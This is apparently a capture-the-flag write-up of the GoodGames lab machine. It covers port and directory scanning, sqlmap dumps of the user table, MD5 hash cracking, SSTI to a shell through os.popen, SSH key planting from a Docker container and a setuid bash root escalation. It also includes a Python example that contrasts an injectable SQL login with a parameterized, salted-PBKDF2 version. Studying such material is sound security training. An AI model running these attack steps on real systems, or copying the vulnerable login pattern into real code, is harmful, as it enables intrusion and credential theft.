```
$ sudo rustscan -b 8192 -u 16384 -a 10.10.11.130 -- -sS -sV -sC -oN 10.10.11.130.$(basename $PWD).nmap.txt
# Nmap 7.92 scan initiated Sat Mar 5 16:23:41 2022 as: nmap -vvv -p 80 -sS -sV -sC -oN 10.10.11.130.goodgames.nmap.txt 10.10.11.130
Nmap scan report for 10.10.11.130
Host is up, received echo-reply ttl 63 (0.081s latency).
Scanned at 2022-03-05 16:23:42 PST for 8s
PORT   STATE SERVICE REASON         VERSION
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.51
|_http-favicon: Unknown favicon MD5: 61352127DC66484D3736CACCF50E7BEB
|_http-title: GoodGames | Community and Store
| http-methods:
|_  Supported Methods: OPTIONS GET HEAD POST
|_http-server-header: Werkzeug/2.0.2 Python/3.9.2
Service Info: Host: goodgames.htb
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Mar 5 16:23:50 2022 -- 1 IP address (1 host up) scanned in 9.64 seconds
```
| Ports | Service | Notes |
|---|---|---|
| 80 | Apache httpd 2.4.51 | GoodGames website, sign up page, profile page, not too much so far. |
```
$ feroxbuster -t 100 -u http://10.10.11.130/ --wordlist /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
200      267l      553w     9294c http://10.10.11.130/login
200      267l      545w     9267c http://10.10.11.130/profile
200      909l     2572w    44212c http://10.10.11.130/blog
200      728l     2070w    33387c http://10.10.11.130/signup
302        4l       24w      208c http://10.10.11.130/logout
200      730l     2069w    32744c http://10.10.11.130/forgot-password
200      287l      620w    10524c http://10.10.11.130/coming-soon
403        9l       28w      277c http://10.10.11.130/server-status
```
I spent a little time enumerating the website and eventually found some basic SQL injection in the login form of the /signup page. Here's our POST request and the admin login response in Burp Suite:

We didn't find too much from enumerating once we were logged in as admin, except that we were redirected to a new subdomain, *internal-administration.goodgames.htb*, which hosts another login page. We don't have credentials for this login page yet. But knowing that we have basic SQL injection, we can try more advanced techniques like UNION SELECT to enumerate and extract data from the database.
```
$ sqlmap -r request.raw --batch --level 5 --risk 3 --database --dump --threads 10
available databases [2]:
[*] information_schema
[*] main
```

```
$ sqlmap -r request.raw --batch --level 5 --risk 3 -D main --tables --dump --threads 10
Database: main
[3 tables]
+---------------+
| user          |
| blog          |
| blog_comments |
+---------------+
```

```
$ sqlmap -r request.raw --batch --level 5 --risk 3 -D main -T user --dump --threads 10
Database: main
Table: user
[2 entries]
+----+-------+---------------------+--------------------------------------+
| id | name  | email               | password                             |
+----+-------+---------------------+--------------------------------------+
| 1  | admin | [email protected]   | <redacted>                           |
| 2  | 1     | [email protected]   | c4ca4238a0b923820dcc509a6f75849b (1) |
+----+-------+---------------------+--------------------------------------+
```
From here we get a nice MD5 hash, which we can easily crack with hashcat or john.

```
$ hashcat -m 0 hash /usr/share/wordlists/rockyou.txt --show
<some-redacted-hash>:<some-super-secret-administrator-password>
```

Using the password we get from cracking the hash, we are able to log in to the Administrator panel we found earlier.
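Both weaknesses on the login path, string-built SQL and unsalted MD5 password storage (the dump shows the second user's hash is plain MD5 of "1"), come from the same kind of code. The following is an added illustration, not the GoodGames application's code: the vulnerable pattern next to a hardened version using a parameterized query and salted PBKDF2, with the in-memory database, the admin e-mail and the passwords all constructed stand-ins.

```python
import hashlib
import hmac
import os
import sqlite3

PBKDF2_ROUNDS = 200_000


def make_db(stored_hash):
    """Constructed in-memory stand-in for the dumped main.user table (not the box's real data)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE user (id INTEGER PRIMARY KEY, name TEXT, email TEXT, password TEXT)")
    con.execute("INSERT INTO user (name, email, password) VALUES (?, ?, ?)",
                ("admin", "admin@example.invalid", stored_hash))
    return con


def legacy_md5(password):
    """Unsalted MD5, the storage format the dump revealed: cracked offline in seconds."""
    return hashlib.md5(password.encode()).hexdigest()


def login_vulnerable(con, email, password):
    """Input concatenated into SQL: a quote inside 'email' rewrites the WHERE clause."""
    sql = f"SELECT name FROM user WHERE email = '{email}' AND password = '{legacy_md5(password)}'"
    row = con.execute(sql).fetchone()
    return row[0] if row else None


def hash_password(password, salt=None):
    """Salted PBKDF2-HMAC-SHA256 stored as salt$digest, so a leaked table has no shared shortcut."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return salt.hex() + "$" + digest.hex()


def verify_password(stored, password):
    """Recompute with the stored salt and compare in constant time."""
    salt_hex, digest_hex = stored.split("$", 1)
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), PBKDF2_ROUNDS)
    return hmac.compare_digest(candidate.hex(), digest_hex)


def login_hardened(con, email, password):
    """Parameterized query: the driver passes 'email' as data, never as SQL text."""
    row = con.execute("SELECT name, password FROM user WHERE email = ?", (email,)).fetchone()
    if row is None or not verify_password(row[1], password):
        return None
    return row[0]
```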
I found SSTI on the profile page in the admin panel. Using the SSTI I was able to call *os.popen()* to get a shell inside the application.
Exploring the Docker container, I barely managed to notice that the host system had a directory mounted at */home/augustus*. Using this knowledge, we were able to create an SSH key with *ssh-keygen* in there, put the public key into *authorized_keys*, and then SSH into the host machine from the container.
From here the privesc was also not obvious. You can copy */bin/bash* from the host into augustus' home directory. Then you can go back into the container and, since we're root there, *chown root:root* the bash binary, then *chmod +s* it to make it setuid. Then we can go back into the host and run *./my-bash -p* to get a root shell, and we're done.